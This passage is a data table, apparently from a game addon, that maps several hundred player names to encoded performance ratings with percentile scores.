["Quickshots"] = "ST:796/99%SB:828/99%SM:995/99%",
["Vordi"] = "LT:617/98%EB:608/94%EM:758/82%",
["Hapec"] = "RT:206/67%LB:757/95%EM:910/93%",
["Jerrygarcia"] = "LT:457/95%EB:745/94%EM:932/94%",
["Onehp"] = "ET:396/93%LB:779/97%LM:964/97%",
["Bilirubin"] = "LT:472/96%EB:715/90%RM:664/73%",
["Nizzarr"] = "SB:797/99%SM:999/99%",
["Linkz"] = "ET:283/84%EB:719/91%EM:910/91%",
["Bemoan"] = "LT:651/98%LB:770/96%EM:924/94%",
["Thiccblade"] = "RT:528/71%EB:714/90%EM:507/82%",
["Puretrickery"] = "ET:694/89%EB:733/93%EM:883/90%",
["Skaryx"] = "ET:741/94%SB:810/99%SM:1016/99%",
["Crimsønblade"] = "ET:704/90%LB:761/96%LM:785/95%",
["Danteshadow"] = "ET:713/91%LB:689/97%EM:679/90%",
["Tamagotchu"] = "ET:711/91%LB:759/95%LM:979/98%",
["Skinnypns"] = "ET:693/90%EB:726/91%LM:959/97%",
["Cruor"] = "LT:748/95%EB:739/93%EM:912/94%",
["Beserker"] = "ET:379/92%EB:682/87%EM:534/84%",
["Paqman"] = "ET:667/87%SB:877/99%SM:1001/99%",
["Backhugs"] = "EB:718/91%EM:837/87%",
["Macdirt"] = "ET:574/77%EB:745/94%EM:751/94%",
["Oldruirui"] = "ET:724/92%EB:731/92%EM:841/86%",
["Gauge"] = "ST:819/99%SB:820/99%SM:1016/99%",
["Nokturnal"] = "ST:672/99%LB:774/97%LM:969/98%",
["Bomtank"] = "ET:722/94%EB:725/94%EM:827/92%",
["Huf"] = "ET:393/93%LB:683/97%EM:818/85%",
["Escano"] = "EB:741/93%EM:882/91%",
["Acklys"] = "ET:652/80%EB:654/89%RM:462/50%",
["Yiliao"] = "ET:444/92%RB:497/71%RM:332/68%",
["Canelina"] = "EB:628/87%EM:754/85%",
["Gomothedilf"] = "RT:563/71%EB:566/81%LM:753/96%",
["Holymydiik"] = "UT:114/39%EB:633/88%CM:63/5%",
["Shelde"] = "CT:26/0%RB:466/67%RM:506/55%",
["Hotsfortots"] = "ST:862/99%LB:739/97%EM:904/94%",
["Lankflagella"] = "ET:460/93%SB:697/99%EM:518/86%",
["Tiarac"] = "ET:414/91%EB:670/91%EM:516/84%",
["Swamis"] = "LB:751/97%LM:957/98%",
["Fsink"] = "CT:68/21%LB:731/96%SM:1040/99%",
["Bublin"] = "LT:634/98%LB:608/96%LM:944/97%",
["Northoliywod"] = "EB:518/92%EM:822/89%",
["Bospriest"] = "ST:689/99%LB:710/95%LM:840/98%",
["Toefer"] = "ET:288/76%EB:592/83%EM:787/84%",
["Halth"] = "ST:705/99%LB:745/97%LM:935/96%",
["Brozen"] = "RT:233/66%LB:727/95%SM:981/99%",
["Armenius"] = "RT:290/68%RB:425/72%EM:589/89%",
["Antinomian"] = "EB:642/88%LM:948/97%",
["Darkpenance"] = "ET:761/92%EB:612/85%LM:963/98%",
["Saka"] = "LT:666/98%EB:597/84%EM:870/94%",
["Teedup"] = "ET:767/92%LB:734/96%EM:809/88%",
["Pumatsol"] = "LT:534/96%EB:606/84%EM:839/91%",
["Nezukrew"] = "UT:301/38%EB:721/94%EM:829/88%",
["Shammywhammy"] = "ET:616/79%LB:567/95%EM:613/90%",
["Darinox"] = "ET:668/86%EB:572/79%EM:766/83%",
["Resword"] = "RT:540/70%EB:542/78%RM:591/65%",
["Tatamii"] = "ET:429/93%EB:677/92%EM:832/90%",
["Medisin"] = "LT:504/95%LB:746/97%SM:1003/99%",
["Ritma"] = "RT:396/52%EB:637/88%EM:645/75%",
["Sarakiel"] = "EB:656/90%EM:860/92%",
["Ventiine"] = "LT:583/97%LB:654/98%LM:925/95%",
["Lazernips"] = "ST:759/99%SB:712/99%LM:870/98%",
["Indexsama"] = "ET:390/90%EB:720/94%EM:886/92%",
["Nartherious"] = "ET:425/93%LB:729/96%EM:899/94%",
["Tiggtigg"] = "LB:774/98%LM:930/96%",
["Smirk"] = "UT:281/35%EB:561/80%EM:726/79%",
["Boja"] = "LT:615/98%EB:619/86%EM:786/85%",
["Mashibaba"] = "LT:537/96%EB:642/88%LM:899/95%",
["Yiffed"] = "ST:685/99%LB:624/97%EM:801/92%",
["Bulli"] = "ST:776/99%LB:663/98%LM:953/98%",
["Joscelyn"] = "UT:140/45%EB:647/89%EM:864/92%",
["Sufr"] = "CT:27/5%EB:509/92%EM:903/94%",
["Malistin"] = "ET:703/89%EB:710/94%EM:860/91%",
["Mullbeutel"] = "LT:671/98%EB:634/87%EM:757/83%",
["Troyhasheals"] = "ET:752/91%LB:730/97%LM:896/96%",
["Comanché"] = "ET:686/84%EB:682/92%LM:915/96%",
["Lemmehillu"] = "CT:199/22%EB:529/92%RM:573/66%",
["Tongsta"] = "LT:772/97%SB:783/99%LM:987/98%",
["Ìcè"] = "LT:750/96%LB:715/95%LM:777/96%",
["Jdeep"] = "LT:752/96%LB:790/98%SM:927/99%",
["Crispykream"] = "LT:746/95%LB:766/98%LM:790/97%",
["Fazisi"] = "ET:725/93%LB:766/96%LM:979/98%",
["Veyda"] = "ET:722/93%EB:681/88%SM:1003/99%",
["Ipew"] = "ET:709/92%EB:659/89%UM:318/38%",
["Cyrenee"] = "ST:825/99%SB:834/99%LM:982/98%",
["Blazed"] = "LT:763/97%LB:659/96%LM:944/96%",
["Oshturbo"] = "LT:672/98%LB:725/98%LM:859/97%",
["Biggersu"] = "LT:786/98%LB:770/97%SM:943/99%",
["Fixture"] = "ET:731/94%SB:811/99%EM:831/92%",
["Itsjoob"] = "ET:721/93%SB:859/99%SM:1115/99%",
["Tyrantbabe"] = "ST:793/99%LB:781/98%EM:904/93%",
["Nosforatu"] = "LT:767/97%LB:782/98%LM:971/98%",
["Mango"] = "LT:786/98%SB:815/99%LM:966/98%",
["Wreckdumb"] = "ST:792/99%SB:804/99%LM:991/98%",
["Frozenfood"] = "ET:707/91%LB:800/98%LM:963/97%",
["Brubaker"] = "LT:770/97%SB:822/99%LM:971/98%",
["Ssj"] = "ET:726/93%EB:587/93%RM:452/51%",
["Gnomprincess"] = "LT:624/98%LB:670/98%EM:894/93%",
["Belloná"] = "ET:727/93%LB:682/97%EM:912/94%",
["Lohm"] = "ET:734/94%SB:846/99%LM:940/96%",
["Sheezzy"] = "LT:745/95%LB:786/98%LM:946/96%",
["Torgar"] = "ST:823/99%SB:787/99%SM:986/99%",
["Mightyarcher"] = "LT:768/97%SB:801/99%LM:954/97%",
["Uhhwhaat"] = "ET:694/90%EB:684/87%EM:734/80%",
["Togapig"] = "ST:850/99%LB:765/97%LM:943/97%",
["Fatalfire"] = "ST:805/99%SB:821/99%SM:1003/99%",
["Inglewood"] = "ET:650/90%EB:715/93%EM:883/94%",
["Iluvahegao"] = "LT:762/96%LB:763/96%LM:942/96%",
["Hugejanice"] = "LT:771/97%LB:753/95%LM:960/97%",
["Gusty"] = "ST:813/99%SB:827/99%SM:996/99%",
["Grenrigar"] = "LT:753/95%LB:777/97%LM:926/95%",
["Cynnister"] = "ET:709/91%EB:701/89%EM:802/84%",
["Jerggy"] = "ST:796/99%LB:783/98%SM:1017/99%",
["Willard"] = "LT:765/97%LB:757/97%LM:936/96%",
["Zdr"] = "ET:347/90%LB:670/96%LM:959/97%",
["Noenoe"] = "LT:741/95%SB:698/99%SM:948/99%",
["Bakr"] = "ST:794/99%LB:750/95%EM:872/92%",
["Tbo"] = "ST:794/99%LB:767/97%SM:969/99%",
["Mistylayne"] = "LT:671/98%LB:629/96%EM:803/85%",
["Massivejoo"] = "RT:467/62%LB:746/96%EM:813/86%",
["Cactusblah"] = "ST:647/99%SB:819/99%SM:1039/99%",
["Judsin"] = "ET:709/91%EB:566/80%EM:707/77%",
["Aggro"] = "ST:793/99%SB:871/99%LM:942/97%",
["Huntelina"] = "ET:723/93%EB:702/89%LM:968/98%",
["Unalia"] = "ST:800/99%EB:698/93%",
["Maxspeed"] = "ET:737/94%EB:747/94%LM:969/97%",
["Autist"] = "ET:717/93%LB:775/97%LM:956/97%",
["Hexea"] = "ST:808/99%LB:776/98%LM:963/97%",
["Drengr"] = "ET:671/88%LB:683/97%RM:597/67%",
["Kebowerung"] = "LT:740/95%EB:437/86%EM:806/86%",
["Valersi"] = "LT:759/96%SB:853/99%LM:963/97%",
["Swopex"] = "ST:790/99%LB:789/98%LM:947/96%",
["Fuegoz"] = "LT:765/97%SB:820/99%SM:1008/99%",
["Demar"] = "LT:773/97%SB:762/99%LM:957/98%",
["Yourggbomb"] = "ET:731/93%SB:764/99%LM:981/98%",
["Nihilus"] = "ST:714/99%LB:783/98%LM:966/97%",
["Uzdoubler"] = "ET:716/92%LB:771/97%LM:933/95%",
["Flowito"] = "ST:759/99%LB:780/98%SM:1008/99%",
["Cxgy"] = "ET:732/93%LB:636/95%EM:814/84%",
["Asscrackx"] = "RT:417/52%RB:281/64%RM:457/50%",
["Haoduoyu"] = "RT:581/74%EB:587/82%EM:782/87%",
["Puckpuck"] = "ET:668/83%EB:671/92%EM:789/88%",
["Tephras"] = "ET:405/93%EB:659/89%EM:883/93%",
["Lfhealz"] = "RT:400/53%RB:382/55%RM:385/74%",
["Thrbankrocco"] = "ET:355/87%EB:646/89%EM:859/91%",
["Kim"] = "RT:189/61%EB:543/75%EM:895/93%",
["Higginz"] = "ET:617/79%LB:584/95%EM:873/92%",
["Bubbleteax"] = "ET:298/81%EB:543/75%EM:495/84%",
["Shaquiloheal"] = "ET:661/84%EB:602/84%EM:745/83%",
["Rumelol"] = "RT:521/66%EB:573/82%EM:768/87%",
["Mothephoquer"] = "RT:381/50%RB:491/72%EM:711/82%",
["Tëddy"] = "ET:334/87%LB:757/98%EM:894/94%",
["Goodannie"] = "ET:776/93%LB:724/96%EM:789/88%",
["Superwarmm"] = "ET:619/78%EB:391/80%EM:814/90%",
["Scaringkids"] = "RT:573/73%EB:667/90%EM:736/80%",
["Musicwyd"] = "RT:509/66%EB:550/76%EM:803/87%",
["Cyntrix"] = "ET:615/80%EB:680/93%SM:1012/99%",
["Hsinstant"] = "ET:783/93%LB:731/95%EM:857/92%",
["Ellipsii"] = "UT:133/45%EB:686/93%EM:648/92%",
["Akentou"] = "ET:595/76%EB:468/87%RM:348/71%",
["Wèndigo"] = "RT:493/66%EB:589/81%EM:827/88%",
["Ebrake"] = "ET:439/93%LB:634/97%EM:846/90%",
["Abralyn"] = "CT:112/12%EM:792/89%",
["Xueqing"] = "RT:447/58%EB:353/75%RM:275/63%",
["Xiaokepai"] = "ET:714/88%EB:588/83%UM:51/29%",
["Adaxx"] = "RT:268/74%EB:601/85%RM:383/74%",
["Whamadin"] = "ET:688/86%LB:621/97%EM:741/81%",
["Jackhiggus"] = "RT:564/71%EB:522/92%EM:418/77%",
["Poonsaver"] = "RT:530/68%EB:605/84%EM:450/79%",
["Dburts"] = "ET:368/87%RB:471/67%EM:820/89%",
["Tandyt"] = "ET:670/85%EB:673/91%EM:777/84%",
["Somelaidback"] = "ET:328/84%EB:615/84%RM:488/53%",
["Flarplol"] = "ET:763/92%EB:540/77%RM:606/71%",
["Yycasskicker"] = "ET:691/85%EB:467/88%EM:838/91%",
["Salchant"] = "ET:413/92%EB:685/92%EM:876/92%",
["Bloed"] = "RT:463/58%EB:583/83%EM:673/93%",
["Angryeyes"] = "UT:284/35%RB:534/74%EM:835/90%",
["Henrioreo"] = "LT:806/95%EB:702/93%EM:867/93%",
["Withewind"] = "ET:691/86%EB:565/80%RM:376/74%",
["Gotosleep"] = "LT:768/98%LB:768/98%LM:945/98%",
["Asterium"] = "ET:317/81%EB:696/94%EM:845/93%",
["Aswolei"] = "RT:159/50%EB:623/88%EM:815/88%",
["Kirinn"] = "ET:592/75%LB:708/95%EM:887/94%",
["Channah"] = "ET:303/79%EB:626/88%EM:694/76%",
["Neinnein"] = "RT:570/73%RB:421/60%RM:560/63%",
["Hisokapri"] = "ET:673/84%EB:626/88%LM:902/96%",
["Ziwouk"] = "ET:617/78%EB:687/91%EM:734/80%",
["Reaver"] = "ET:624/77%EB:704/93%RM:676/74%",
["Pamperram"] = "LT:504/96%EB:414/82%RM:354/72%",
["Casthole"] = "RT:533/68%EB:607/84%EM:815/88%",
["Littleboss"] = "LT:822/96%EB:515/92%EM:844/90%",
["Thizguy"] = "ET:621/78%EB:641/89%EM:735/84%",
["Atriel"] = "RT:471/60%LB:721/95%LM:944/97%",
["Phaelur"] = "ET:716/87%EB:655/89%EM:806/86%",
["Alyuzandah"] = "LT:808/95%EB:706/93%LM:927/97%",
["Audra"] = "RT:485/62%EB:612/85%EM:883/92%",
["Squishyy"] = "ET:443/93%LB:707/95%EM:791/89%",
["Blessme"] = "RT:583/74%EB:693/93%LM:930/97%",
["Bango"] = "RT:230/67%EB:650/89%EM:778/85%",
["Tether"] = "RT:533/68%EB:583/81%EM:803/87%",
["Chadgamer"] = "UT:243/29%RB:486/70%RM:467/51%",
["Chevroleet"] = "ET:467/94%SB:794/99%LM:922/95%",
["Divyana"] = "ET:406/90%LB:728/95%LM:901/95%",
["Slickstir"] = "ET:703/90%SB:766/99%LM:898/98%",
["Tribulations"] = "LT:747/95%EB:734/92%EM:889/91%",
["Zhifubao"] = "ET:726/93%EB:696/89%EM:805/84%",
["Provocative"] = "RT:192/71%SB:789/99%LM:955/97%",
["Mike"] = "ST:761/99%SB:782/99%SM:1017/99%",
["Valune"] = "LT:739/98%SB:793/99%LM:908/96%",
["Jbyd"] = "LT:768/97%SB:807/99%LM:976/98%",
["Cmill"] = "ET:695/90%LB:703/97%EM:915/93%",
["Pwnman"] = "ET:616/82%LB:758/95%EM:915/94%",
["Conjuan"] = "ET:719/92%EB:569/92%EM:855/88%",
["Tealol"] = "LT:779/98%LB:779/98%EM:881/92%",
["Mialele"] = "ET:740/94%LB:735/98%LM:954/96%",
["Raelynne"] = "LT:753/96%SB:802/99%LM:972/98%",
["Tankthefrank"] = "ET:341/90%EB:704/89%EM:709/75%",
["Smolders"] = "ET:700/90%LB:764/96%EM:769/94%",
["Tabda"] = "LT:776/97%EB:735/93%EM:898/91%",
["Larrygarcia"] = "ET:249/79%EB:699/89%EM:865/89%",
["Imám"] = "ET:348/89%EB:704/89%EM:784/82%",
["Ânduin"] = "RT:500/69%EB:698/89%EM:842/89%",
["Shmizmay"] = "ET:382/93%LB:755/95%EM:899/93%",
["Ssiren"] = "ET:709/91%LB:750/95%RM:683/72%",
["Jclarkt"] = "UT:110/40%EB:729/92%EM:837/87%",
["Krendryn"] = "ET:718/92%SB:783/99%LM:829/97%",
["Hektor"] = "ST:812/99%SB:808/99%LM:930/96%",
["Tuls"] = "LT:778/98%SB:802/99%EM:875/90%",
["Iolol"] = "LT:773/98%SB:743/99%SM:917/99%",
["Banjiazei"] = "ET:676/88%LB:717/98%EM:885/94%",
["Sharing"] = "ET:672/88%EB:705/89%EM:820/85%",
["Goodbyekobe"] = "ET:696/90%SB:751/99%LM:934/95%",
["Smallsensei"] = "ET:717/91%LB:741/98%EM:921/93%",
["Comedian"] = "ET:689/88%EB:748/94%EM:914/93%",
["Bolas"] = "ET:716/91%LB:780/97%EM:919/93%",
["Simc"] = "ET:651/84%LB:763/96%EM:913/93%",
["Unclephilthy"] = "ET:368/92%EB:710/90%EM:824/86%",
["Benisato"] = "ET:649/84%EB:701/89%EM:866/89%",
["Redhoof"] = "RT:436/69%SB:793/99%SM:1004/99%",
["Doubledunker"] = "EB:560/91%EM:852/90%",
["Tuffnuts"] = "ET:696/90%EB:695/88%EM:794/83%",
["Dynadan"] = "LT:472/96%EB:745/93%EM:798/77%",
["Dnt"] = "ET:301/86%EB:712/90%EM:881/91%",
["Donquixotee"] = "RT:232/73%EB:706/90%LM:928/95%",
["Bigsavage"] = "ET:682/89%EB:710/90%EM:613/89%",
["Shoji"] = "RT:186/65%EB:726/91%EM:840/87%",
["Stephany"] = "LT:789/98%LB:778/98%EM:890/91%",
["Jibztank"] = "LT:771/98%LB:761/95%LM:928/95%",
["Originalz"] = "ST:789/99%SB:819/99%LM:967/98%",
["Chunga"] = "EB:678/87%EM:865/89%",
["Gradalpha"] = "RT:541/74%EB:692/88%EM:865/91%",
["Crenshaw"] = "LT:615/98%LB:660/96%EM:917/93%",
["Pauljones"] = "LB:777/97%LM:950/96%",
["Razzler"] = "SB:839/99%SM:1040/99%",
["Sammehh"] = "RT:431/61%EB:750/94%EM:793/83%",
["Manzelios"] = "ET:648/85%LB:704/97%EM:540/85%",
["Jïhnn"] = "ET:373/91%LB:752/95%LM:903/98%",
["Brianfantana"] = "UT:95/38%EB:735/92%EM:769/81%",
["Mtndewgamer"] = "ET:662/85%EB:707/90%EM:865/90%",
["Awwshiiet"] = "LT:755/96%SB:765/99%LM:934/96%",
["Autotoon"] = "ST:805/99%SB:830/99%LM:986/98%",
["Irishcoffee"] = "EB:687/88%EM:687/76%",
["Sanguis"] = "ET:355/90%LB:765/96%EM:879/91%",
["Kytz"] = "ST:800/99%SB:823/99%SM:1004/99%",
["Gerrypaladin"] = "CT:31/1%EB:368/77%EM:841/89%",
["Bartster"] = "LB:738/96%LM:976/98%",
["Zhuangzhuang"] = "RT:473/60%EB:574/82%UM:336/40%",
["Austenn"] = "EB:658/91%EM:814/90%",
["Flashheals"] = "ET:477/94%EB:646/89%EM:857/92%",
["Kirya"] = "ET:344/84%EB:721/94%EM:882/92%",
["Apriloneal"] = "LT:814/96%EB:685/94%LM:730/95%",
["Muave"] = "CT:34/1%EB:397/80%RM:593/65%",
["Izm"] = "ET:629/81%EB:540/77%EM:788/85%",
["Marukami"] = "ET:675/84%RB:496/71%EM:839/90%",
["Optimexprime"] = "CT:205/24%EB:555/79%RM:581/64%",
["Arius"] = "LT:630/98%EB:466/88%EM:816/88%",
["Narphie"] = "LT:511/95%EB:523/92%EM:822/87%",
["Bryans"] = "ST:716/99%EB:681/92%LM:945/98%",
["Tgif"] = "ET:596/75%EB:653/90%EM:789/86%",
["Thundorc"] = "RT:445/56%LB:737/95%EM:875/91%",
["Bladeorath"] = "LT:491/95%EB:671/91%LM:931/96%",
["Noobiez"] = "ET:354/84%EB:513/91%EM:596/91%",
["Melonbluesea"] = "RT:237/71%EB:568/80%RM:615/67%",
["Bracks"] = "ET:731/90%EB:671/90%EM:892/93%",
["Emberbraid"] = "CT:184/21%RB:498/72%EM:748/82%",
["Shipshape"] = "ET:633/81%LB:747/97%LM:946/97%",
["Graco"] = "ET:646/81%EB:635/89%EM:731/83%",
["Roarn"] = "SB:775/99%SM:989/99%",
["Krzyeyekilla"] = "CT:81/7%EB:557/77%LM:920/95%",
["Scrubnuts"] = "ET:758/92%EB:615/86%EM:789/87%",
["Beet"] = "ET:329/83%EB:656/90%EM:735/81%",
["Hudoken"] = "ET:701/87%EB:649/92%EM:810/92%",
["Wetdadholes"] = "CT:98/9%LB:756/98%LM:945/97%",
["Cubanlinks"] = "EB:625/86%RM:658/73%",
["Dîsposed"] = "CT:48/14%EB:468/88%RM:535/58%",
["Buntain"] = "ET:316/81%LB:700/95%EM:883/93%",
["Wahfury"] = "ET:547/86%EB:584/86%EM:496/78%",
["Sseng"] = "RT:546/68%EB:548/93%LM:778/96%",
["Niralt"] = "RB:435/63%RM:449/69%",
["Ryokuu"] = "RT:253/71%EB:583/81%EM:861/92%",
["Edstark"] = "RT:149/50%EB:634/87%EM:746/81%",
["Sregi"] = "ET:674/85%LB:725/95%LM:954/97%",
["Mailia"] = "ET:738/89%LB:655/97%LM:782/96%",
["Matchacake"] = "EB:695/94%EM:675/77%",
["Javu"] = "EB:641/87%LM:920/95%",
["Gaspari"] = "LT:553/96%EB:574/94%EM:841/91%",
["Baccani"] = "LT:506/95%EB:673/92%EM:820/89%",
["Nephilite"] = "LT:518/96%EB:692/93%EM:817/90%",
["Kristalrose"] = "UT:109/34%RB:332/73%UM:395/42%",
["Seoulforge"] = "EB:371/77%EM:736/83%",
["Kilomanjaro"] = "CT:78/7%EB:547/78%EM:738/84%",
["Naimi"] = "ET:418/91%EB:637/88%EM:877/93%",
["Healski"] = "RT:541/68%EB:505/91%EM:518/84%",
["Cheesecurd"] = "EB:627/88%LM:897/95%",
["Thunderntz"] = "RT:183/59%EB:638/87%EM:881/93%",
["Toehead"] = "ET:608/76%EB:677/91%EM:709/78%",
["Mayolover"] = "CT:53/4%EB:554/79%EM:835/88%",
["Gibkeeg"] = "EB:628/87%EM:882/93%",
["Sorming"] = "LT:755/95%EB:734/92%EM:911/93%",
["Satiana"] = "ST:790/99%SB:775/99%LM:985/98%",
["Pics"] = "LT:776/98%LB:705/98%LM:966/97%",
["Forcemajeure"] = "LT:776/98%SB:831/99%SM:957/99%",
["Cyllezz"] = "ET:726/93%EB:735/93%EM:905/93%",
["Xert"] = "ST:826/99%SB:825/99%SM:1032/99%",
["Bananamilk"] = "ST:833/99%SB:843/99%LM:968/97%",
["Möxie"] = "LT:532/97%LB:761/96%EM:875/91%",
["Kezz"] = "LT:769/97%LB:642/95%EM:922/94%",
["Sickmyduck"] = "LT:751/95%LB:767/97%EM:740/80%",
["Oceano"] = "ET:661/86%EB:625/81%RM:653/72%",
["Doyouevnlift"] = "ST:828/99%SB:835/99%LM:959/96%",
["Chrixus"] = "ET:719/92%EB:736/92%EM:836/87%",
["Doog"] = "LT:785/98%LB:741/96%EM:861/90%",
["Syrasem"] = "ST:740/99%EB:643/88%RM:196/53%",
["Oneechan"] = "LT:759/96%SB:802/99%SM:1000/99%",
["Uncletouchan"] = "ET:643/89%EB:685/87%EM:698/84%",
["Briverson"] = "LT:761/96%SB:810/99%SM:1011/99%",
["Gongsho"] = "ST:791/99%LB:781/98%LM:947/96%",
["Xiaomomo"] = "LT:751/96%EB:715/94%LM:788/97%",
["Dripchief"] = "LT:775/98%SB:797/99%SM:914/99%",
["Sweetteabag"] = "ST:715/99%SB:769/99%LM:963/97%",
["Zuglug"] = "ET:740/94%LB:760/96%EM:835/86%",
["Noss"] = "LT:765/97%LB:765/96%LM:958/97%",
["Zhufbar"] = "LT:757/96%EB:670/90%RM:518/64%",
["Dichotomy"] = "ET:653/85%EB:751/94%EM:926/94%",
["Zonas"] = "LT:752/96%LB:790/98%LM:944/97%",
["Vitae"] = "ST:793/99%SB:815/99%LM:928/97%",
["Foxxyy"] = "ET:709/92%EB:613/85%EM:689/81%",
["Phirlexious"] = "LT:469/95%EB:646/88%EM:813/91%",
["Titanicmage"] = "ET:707/91%EB:683/92%EM:821/87%",
["Ltrainn"] = "RT:551/73%EB:672/87%EM:873/91%",
["Doggyeggy"] = "LT:755/96%SB:824/99%LM:952/97%",
["Thorgoon"] = "LT:748/95%LB:775/97%LM:974/98%",
["Skertbangerz"] = "LT:782/98%LB:761/96%EM:825/85%",
["Diavel"] = "ET:721/92%EB:728/92%EM:730/92%",
["Neò"] = "ET:738/94%LB:666/98%SM:936/99%",
["Skreetz"] = "ET:623/81%EB:640/83%EM:433/75%",
["Eozapus"] = "LT:764/96%EB:705/90%EM:878/91%",
["Chaejjik"] = "ST:802/99%LB:743/96%SM:965/99%",
["Belowme"] = "ET:701/90%LB:757/95%EM:898/93%",
["Rebellion"] = "LT:669/98%LB:772/97%LM:977/98%",
["Moobmats"] = "ST:768/99%LB:653/97%EM:908/94%",
["Ater"] = "ST:805/99%SB:840/99%SM:989/99%",
["Rerock"] = "LT:787/98%LB:771/97%EM:917/94%",
["Wut"] = "LT:746/96%LB:752/95%LM:940/95%",
["Thechaos"] = "LT:449/95%LB:760/97%LM:993/98%",
["Roofees"] = "ET:737/94%LB:783/98%LM:958/98%",
["Audel"] = "LT:791/98%LB:771/97%LM:939/95%",
["Darkconceale"] = "ST:798/99%LB:774/97%EM:882/90%",
["Kalizk"] = "ST:797/99%LB:793/98%LM:940/95%",
["Linus"] = "ET:718/92%LB:742/96%LM:941/97%",
["Moobshake"] = "ST:796/99%SB:791/99%SM:1000/99%",
["Prideless"] = "LT:647/98%LB:780/97%LM:993/98%",
["Bliinx"] = "ET:660/86%EB:695/89%EM:745/80%",
["Syrencere"] = "LT:744/95%LB:648/97%LM:957/97%",
["Kassie"] = "ST:733/99%SB:716/99%LM:967/97%",
["Killerfrost"] = "LT:763/96%LB:778/97%LM:995/98%",
["Newwing"] = "LT:765/97%LB:800/98%LM:996/98%",
["Desktop"] = "ST:681/99%EB:717/94%LM:877/95%",
["Eradicator"] = "ET:663/87%EB:699/90%EM:881/92%",
["Baekyeol"] = "ET:597/79%EB:625/82%EM:463/82%",
["Villain"] = "LT:780/98%LB:738/98%LM:951/96%",
["Elyx"] = "ST:816/99%SB:818/99%SM:1042/99%",
["Garalin"] = "ET:790/94%EB:703/93%LM:869/98%",
["Oliviabell"] = "LT:649/98%LB:616/96%EM:700/94%",
["Milkpunch"] = "RT:417/52%EB:639/87%EM:692/76%",
["Freezfly"] = "ET:751/91%EB:515/92%EM:791/86%",
["Bogus"] = "ET:689/84%EB:712/94%EM:690/78%",
["Pigecha"] = "ET:328/82%EB:569/94%LM:777/96%",
["Aratare"] = "ET:781/93%LB:599/96%LM:928/97%",
["Nevorian"] = "ET:302/81%EB:558/77%EM:753/82%",
["Barksdale"] = "UT:312/38%RB:516/74%RM:652/72%",
["Only"] = "ET:359/79%EB:577/86%EM:834/89%",
["Treesquid"] = "ET:471/94%EB:467/88%EM:828/89%",
["Meklore"] = "ET:393/89%LB:738/97%EM:850/91%",
["Tenpercent"] = "RT:470/60%RB:503/71%RM:465/54%",
["Amandaa"] = "RT:532/68%EB:591/81%EM:858/91%",
["Lushyheals"] = "UT:268/32%RB:393/68%RM:531/73%",
["Adethi"] = "RT:262/73%EB:533/76%EM:682/75%",
["Hotsu"] = "RT:518/65%EB:559/94%UM:227/27%",
["Fairlyasian"] = "UT:384/48%LB:714/96%LM:917/96%",
["Neeine"] = "ET:280/75%EB:621/84%EM:887/92%",
["Zubb"] = "ET:468/94%EB:620/87%EM:758/86%",
["Kwality"] = "RT:232/67%EB:652/89%EM:571/88%",
["Palles"] = "UT:337/41%RB:392/55%UM:308/35%",
["Hinatahyuga"] = "UT:315/38%EB:686/92%EM:769/83%",
["Ayemy"] = "ET:396/90%EB:535/93%LM:788/97%",
["Crushadin"] = "RT:231/70%EB:604/83%EM:807/87%",
["Totallydead"] = "RT:524/67%EB:643/89%EM:868/92%",
["Cannaßis"] = "ET:758/91%EB:671/91%EM:715/81%",
["Pronto"] = "UT:377/47%EB:544/78%RM:607/67%",
["Oldpipi"] = "ET:299/79%EB:677/93%EM:734/80%",
["Shiektal"] = "LT:606/97%EB:412/83%EM:848/89%",
["Unbreakablez"] = "ET:608/76%EB:656/88%EM:791/85%",
["Mellowgear"] = "ET:292/78%EB:616/85%EM:807/87%",
["Pyrodavë"] = "ET:795/94%LB:671/98%EM:774/86%",
["Barlon"] = "RT:188/57%RB:448/61%EM:764/83%",
["Ruberboy"] = "ET:760/91%LB:668/98%LM:922/96%",
["Hordemum"] = "ET:794/94%EB:673/91%EM:830/90%",
["Branzilla"] = "ET:749/91%SB:700/99%EM:877/94%",
["Tananda"] = "ET:627/80%LB:640/97%LM:741/95%",
["Blacksoil"] = "ET:703/87%EB:644/89%EM:678/78%",
["Cameltoetem"] = "ET:344/84%LB:745/96%LM:945/98%",
["Fathersday"] = "UT:145/48%EB:555/79%EM:711/78%",
["Stiphler"] = "ET:794/94%LB:623/97%LM:933/97%",
["Triarius"] = "RT:250/70%EB:560/78%EM:735/84%",
["Gudkush"] = "ET:321/81%LB:623/96%EM:852/90%",
["Holyshoc"] = "ET:311/82%EB:653/90%EM:820/90%",
["Zerxusdral"] = "ET:597/76%LB:609/96%LM:902/96%",
["Treeknight"] = "ET:777/93%LB:654/98%EM:773/86%",
["Gannindalf"] = "RT:566/72%EB:666/92%EM:889/94%",
["Brbokback"] = "UT:368/46%UB:332/44%EM:735/80%",
["Lizpet"] = "ET:770/92%LB:778/98%SM:986/99%",
["Prairie"] = "LT:604/97%EB:465/88%EM:819/88%",
["Staticc"] = "UT:92/31%EB:569/79%RM:440/51%",
["Promisex"] = "ET:384/90%EB:565/80%EM:870/92%",
["Poze"] = "UT:28/31%EB:569/79%RM:513/56%",
["Rivendelle"] = "RT:522/66%RB:336/73%UM:308/36%",
["Wit"] = "ET:778/93%LB:664/98%LM:912/96%",
["Sadboys"] = "RT:232/67%EB:377/78%RM:431/51%",
["Kataryna"] = "RT:523/67%EB:600/84%EM:814/89%",
["Anickel"] = "ET:773/93%LB:722/95%EM:884/93%",
["Leiichu"] = "LT:863/98%EB:645/90%EM:770/89%",
["Magzz"] = "ET:666/82%EB:663/90%EM:680/93%",
["Omara"] = "RT:241/71%EB:628/86%EM:897/94%",
["Restoholic"] = "LT:545/96%LB:664/98%EM:639/91%",
["Stewart"] = "UT:352/45%EB:718/91%EM:767/80%",
["Sumptuous"] = "ET:636/84%LB:678/96%EM:848/88%",
["Minja"] = "ET:696/89%EB:724/92%LM:966/98%",
["Avanti"] = "ST:790/99%SB:810/99%LM:967/98%",
["Erryk"] = "ET:351/89%LB:780/97%EM:870/89%",
["Cheytac"] = "RT:403/55%EB:716/90%LM:955/96%",
["Poeleuhane"] = "RT:449/61%EB:693/88%EM:732/93%",
["Doublemeat"] = "LT:738/95%LB:696/97%EM:746/94%",
["Sassyn"] = "ET:716/91%LB:775/97%LM:967/98%",
["Kylecrossrd"] = "ET:375/92%EB:746/94%EM:764/94%",
["Pinkscruff"] = "ET:656/90%EB:716/93%EM:811/90%",
["Johnceña"] = "ET:641/83%LB:693/97%EM:551/83%",
["Platina"] = "ET:738/94%EB:558/91%LM:949/97%",
["Mikasa"] = "EB:670/86%RM:532/57%",
["Camaron"] = "ET:589/79%EB:681/87%EM:840/87%",
["Xenohoy"] = "ET:403/94%LB:658/96%LM:914/98%",
